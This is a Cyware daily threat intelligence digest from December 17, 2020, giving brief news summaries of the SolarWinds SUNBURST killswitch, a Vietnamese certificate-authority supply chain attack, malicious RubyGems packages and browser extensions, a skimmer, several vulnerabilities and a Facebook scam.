Cyware Daily Threat Intelligence, December 17, 2020

Share Blog Post

Supply chain chaos is turning ugly as threat actors evolve their attack techniques. After the infamous SolarWinds attack, researchers have found a new supply chain attack targeting the Vietnam Government Certification Authority (VGCA). The attack was used to compromise the agency’s digital signature toolkit to install spyware called PhantomNet or Smanager on victims’ systems.

Meanwhile, giving a befitting reply to attackers behind SolarWind attacks, Microsoft, in collaboration with FireEye and GoDaddy, have created a killswitch for SUNBURST backdoor to disrupt the operations of the malware.

In other news, two malicious RubyGems packages and 28 malicious Chrome extensions were found stealing cryptocurrencies and users’ data respectively.

Top Breaches Reported in the Last 24 Hours

Widespread banking fraud campaign
Threat actors have managed to steal millions of dollars from US and EU banks in an ongoing worldwide mobile banking fraud campaign. To do that, the attackers used huge emulator farms that helped them access thousands of hacked accounts using spoofed mobile devices. According to reports, over 20 emulators have been used to hack accounts from over 16,000 compromised devices.

Supply chain attack
Researchers have uncovered a new supply chain attack targeting the Vietnam Government Certification Authority (VGCA). The attack was used to compromise the agency’s digital signature toolkit to install spyware called PhantomNet or Smanager on victims’ systems. The breach occurred between July 23 and August 16.

Top Malware Reported in the Last 24 Hours

Kill Switch for SUNBURST
In a collaboration effort from Microsoft and GoDaddy, FireEye has created a killswitch for Sunburst malware that has reportedly infected SolarWinds’ Orion platform. The backdoor had impacted several U.S. government agencies and many private firms such as Boeing, AT&T, and Ford.

Malicious RubyGems package
Two new malicious RubyGems packages were taken down from the RubyGems repository for their participation in a supply chain attack designed to steal cryptocurrency from unsuspecting users. These packages masqueraded as a bitcoin library and a library for displaying strings with different color effects. They were named 'pretty_color-0.8.1.gem' and 'ruby-bitcoin-0.0.20.gem' and contained a malicious Ruby script that creates VBS scripts that act as clipboard hijackers.

Meyhod skimmer discovered
Researchers have discovered a new skimmer called Meyhod on several e-commerce sites including websites for hair treatment company Bosley and the Chicago Architecture Center (CAC). Elements of the code vary across different victim sites, with operators appearing to tailor them to match those used by each victim site.

Malicious extensions
Researchers have found around 28 malicious Chrome and Edge extensions that can allow attackers to steal users’ data and redirect victims to ads and phishing sites. These tainted extensions pose as helper add-ons for Vimeo, Instagram, Facebook, and other popular online services.

Top Vulnerabilities Reported in the Last 24 Hours

Trend Micro patches serious flaws
Trend Micro has issued updates for serious vulnerabilities affecting its InterScan Web Security Virtual Appliance (IWSVA). These flaws are related to CSRF protection bypass, XSS, authorization and authentication bypass, command execution, and command injection issues.

Faulty P2P file sharing feature
Design flaws discovered in Huawei, LG, and Xiaomi smartphones can allow attackers to hijack file transfer sessions. The flaws exist in the P2P file-sharing features of these smartphones. 

HPE discloses a zero-day bug
HPE has shared mitigations for a zero-day vulnerability that affects the latest versions of its proprietary HPE Systems Insight Manager (SIM) software for Windows and Linux. The flaw is tracked as CVE-2020-7200 and is rated 9.8 on the CVSS scale.

Top Scams Reported in the Last 24 Hours

Christmas bonus scam
Experts are warning Facebook users to be on the lookout for a Christmas bonus scam that appears to come from individuals in their contact lists. The message claims to offer a Christmas bonus or Christmas benefit, for which the targeted victim is asked to contact a Facebook Agent who will send a new message regarding the contest sponsored by Powerball. The ultimate purpose of the scam is to steal personal information and money from victims.


sunburst backdoor
malicious extensions
rubygems packages
meyhod skimmer
christmas bonus scam

Posted on: December 17, 2020

Get the Daily Threat Briefing delivered to your email!

More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.

Join Thousands of Other Cyware Followers!